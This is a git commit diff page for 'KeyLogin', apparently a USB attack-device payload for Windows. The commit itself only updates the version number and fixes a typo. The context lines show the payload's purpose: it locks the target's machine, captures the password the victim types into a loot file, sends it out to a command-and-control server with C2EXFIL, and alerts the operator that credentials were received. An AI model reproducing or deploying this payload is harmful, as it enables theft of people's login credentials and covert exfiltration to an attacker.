Update and rename payload.txt.txt to payload.txt

pull/46/head
0iphor13 2022-11-04 21:38:07 +01:00 committed by GitHub
parent 744b1828f8
commit a4d572a1ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 3 deletions

View File

@ -1,5 +1,5 @@
###############################KeyLogin##################################### ###############################KeyLogin#####################################
# Version 1.0 # Version 1.1
# OS: Windows # OS: Windows
# Author: 0iphor13 # Author: 0iphor13
# Discription: This extremely simple payload will lock the targets machine and will wait for it to insert the password. # Discription: This extremely simple payload will lock the targets machine and will wait for it to insert the password.
@ -33,7 +33,7 @@ while [ ! -f /root/loot/win-pass.txt ]; do sleep 2; done
C2EXFIL /root/loot/win-pass.txt C2EXFIL /root/loot/win-pass.txt
Q DELAY 1000 Q DELAY 1000
C2NOTIFY INFO 'User Credentials Recieved!' C2NOTIFY INFO 'User Credentials Received!'
#You may want to delete or disable to payload after execution to avoid endless logout processes #You may want to delete or disable to payload after execution to avoid endless logout processes
#rm /root/udisk/payloads/KeyLogin.txt #rm /root/udisk/payloads/KeyLogin.txt